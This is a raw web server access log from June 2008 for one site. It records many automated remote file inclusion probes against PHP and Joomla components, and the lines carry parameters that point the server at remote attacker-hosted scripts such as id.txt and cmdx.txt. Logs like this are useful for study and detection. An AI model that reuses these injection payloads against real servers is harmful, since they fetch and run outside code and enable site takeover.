213.8.106.125 - - [24/Jun/2008:09:51:05 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:09:51:27 -0700] "GET /logs/access_080212.log/avatar.php?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:09:51:27 -0700] "GET /logs/avatar.php?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:09:51:36 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.56.172.161 - - [24/Jun/2008:09:51:50 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:09:52:10 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:09:52:25 -0700] "GET /logs/access_080220.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:09:52:25 -0700] "GET /logs/access_080220.log/components/com_performs/performs.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.117.241.196 - - [24/Jun/2008:09:52:39 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.117.241.196 - - [24/Jun/2008:09:52:44 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:09:52:52 -0700] "GET //errors.php?error=http://www.geocities.com/siskagita/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:09:52:52 -0700] "GET /logs//errors.php?error=http://www.geocities.com/siskagita/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:09:52:59 -0700] "GET /logs/access_080131.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:09:53:16 -0700] "GET /logs/access_080212.log/avatar.php?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:09:53:16 -0700] "GET /logs/avatar.php?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:53:20 -0700] "GET /logs/access_071213.log//inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:53:20 -0700] "GET //inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:53:20 -0700] "GET /logs//inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:09:53:28 -0700] "GET /avatar.php?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:09:53:29 -0700] "GET /avatar.php?page=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:09:53:30 -0700] "GET /avatar.php?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:53:35 -0700] "GET /logs//inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:53:35 -0700] "GET //inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:09:53:40 -0700] "GET /logs/access_071212.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://waynesvillelive.com/livepics/albums/ghost%20town/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:09:53:40 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://waynesvillelive.com/livepics/albums/ghost%20town/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.167.156.20 - - [24/Jun/2008:09:53:40 -0700] "GET //includes/messages.inc.php?include_path=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:53:43 -0700] "GET /logs/access_080421.log//inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:09:53:45 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://waynesvillelive.com/livepics/albums/ghost%20town/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:53:48 -0700] "GET /logs//inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:53:48 -0700] "GET //inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:09:53:52 -0700] "GET /logs/access_080215.log/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:09:53:52 -0700] "GET /errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:09:53:52 -0700] "GET /logs/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
74.6.22.157 - - [24/Jun/2008:09:53:53 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.117.241.196 - - [24/Jun/2008:09:53:57 -0700] "GET /logs/access_080215.log//language/lang_english/errors.php?error=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.117.241.196 - - [24/Jun/2008:09:53:58 -0700] "GET //language/lang_english/errors.php?error=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.117.241.196 - - [24/Jun/2008:09:53:58 -0700] "GET /logs//language/lang_english/errors.php?error=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:54:16 -0700] "GET /logs/access_071213.log//inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:54:16 -0700] "GET //inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:54:16 -0700] "GET /logs//inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:54:38 -0700] "GET /logs/access_080421.log//inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:09:54:47 -0700] "GET /logs/access_080212.log/avatar.php?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:09:54:47 -0700] "GET /logs/avatar.php?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:09:54:53 -0700] "GET /logs/access_080326.log/avatar.php?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.70.18 - - [24/Jun/2008:09:55:18 -0700] "GET /logs/access_080418.log//citywriter/head.php?path=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.70.18 - - [24/Jun/2008:09:55:18 -0700] "GET //citywriter/head.php?path=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.70.18 - - [24/Jun/2008:09:55:18 -0700] "GET /logs//citywriter/head.php?path=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.139.226 - - [24/Jun/2008:09:55:41 -0700] "GET /logs/access_080211.log/index.php?nuseo_dir=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [24/Jun/2008:09:55:46 -0700] "GET /logs/index.php?nuseo_dir=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.195.42.191 - - [24/Jun/2008:09:56:01 -0700] "GET /logs/access.log/index.php?url=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:09:56:01 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://waynesvillelive.com/livepics/albums/ghost%20town/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.139.226 - - [24/Jun/2008:09:56:02 -0700] "GET /index.php?nuseo_dir=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 500 374 "-" "libwww-perl/5.810" "www.dmulk.com"
216.195.42.191 - - [24/Jun/2008:09:56:06 -0700] "GET /logs/index.php?url=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:09:56:21 -0700] "GET /logs/access_080326.log/avatar.php?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.195.42.191 - - [24/Jun/2008:09:56:22 -0700] "GET /index.php?url=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 500 374 "-" "libwww-perl/5.803" "www.dmulk.com"
195.117.241.196 - - [24/Jun/2008:09:56:45 -0700] "GET /logs/access_080215.log/errors.php?error=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.117.241.196 - - [24/Jun/2008:09:56:45 -0700] "GET /errors.php?error=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.117.241.196 - - [24/Jun/2008:09:56:46 -0700] "GET /logs/errors.php?error=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.61.67.58 - - [24/Jun/2008:09:56:48 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.61.67.58 - - [24/Jun/2008:09:56:49 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
69.61.67.58 - - [24/Jun/2008:09:56:49 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:09:56:56 -0700] "GET /logs/access_071212.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://waynesvillelive.com/livepics/albums/ghost%20town/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:09:56:57 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://waynesvillelive.com/livepics/albums/ghost%20town/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:09:56:57 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://waynesvillelive.com/livepics/albums/ghost%20town/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:09:57:01 -0700] "GET /logs/access_080212.log/avatar.php?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:09:57:01 -0700] "GET /logs/access_080212.log/avatar.php?page=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:09:57:01 -0700] "GET /logs/avatar.php?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:09:57:02 -0700] "GET /logs/avatar.php?page=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:09:57:12 -0700] "GET /logs/access_071212.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://waynesvillelive.com/livepics/albums/ghost%20town/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:09:57:12 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://waynesvillelive.com/livepics/albums/ghost%20town/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:09:57:12 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://waynesvillelive.com/livepics/albums/ghost%20town/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:09:58:19 -0700] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:09:58:19 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:09:58:29 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://waynesvillelive.com/livepics/albums/ghost%20town/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.100.144 - - [24/Jun/2008:09:58:35 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://waynesvillelive.com/livepics/albums/ghost%20town/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:09:58:38 -0700] "GET /logs/access_080326.log/avatar.php?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:09:58:47 -0700] "GET //modules/xfsection/modify.php?dir_module=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:09:59:02 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:09:59:03 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:09:59:04 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:09:59:04 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.195.42.191 - - [24/Jun/2008:09:59:23 -0700] "GET /logs/access_080118.log/index.php?url=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:09:59:32 -0700] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:09:59:32 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:09:59:43 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [24/Jun/2008:09:59:43 -0700] "GET /logs/access_080211.log/index.php?nuseo_dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:09:59:44 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:09:59:44 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [24/Jun/2008:09:59:48 -0700] "GET /logs/index.php?nuseo_dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.12.244.192 - - [24/Jun/2008:09:59:51 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.12.244.192 - - [24/Jun/2008:09:59:52 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
209.12.244.192 - - [24/Jun/2008:09:59:52 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.195.42.191 - - [24/Jun/2008:10:00:04 -0700] "GET /index.php?nuseo_dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 500 374 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:00:08 -0700] "GET /logs/access_080127.log//modules/TotalCalendar/about.php?inc_dir=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:00:13 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:00:13 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:00:13 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:10:00:37 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:10:00:40 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.89.22.121 - - [24/Jun/2008:10:00:58 -0700] "GET /logs/access_080312.log//?page=http://sucomais2.angelfire.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.121 - - [24/Jun/2008:10:00:59 -0700] "GET /logs//?page=http://sucomais2.angelfire.com/safe.txt? HTTP/1.1" 200 53281 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:01:18 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:10:01:19 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:01:20 -0700] "GET /logs/access_080127.log//modules/4nAlbum/public/displayCategory.php?basepath=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:01:21 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:10:01:26 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:01:31 -0700] "GET /logs/access_080330.log//main.php?appserv_root=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:01:31 -0700] "GET //main.php?appserv_root=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:01:31 -0700] "GET /logs//main.php?appserv_root=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:01:31 -0700] "GET /logs/access_080319.log//main.php?appserv_root=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:01:35 -0700] "GET /logs/access_080106.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:10:01:49 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:02:01 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:02:02 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:02:16 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
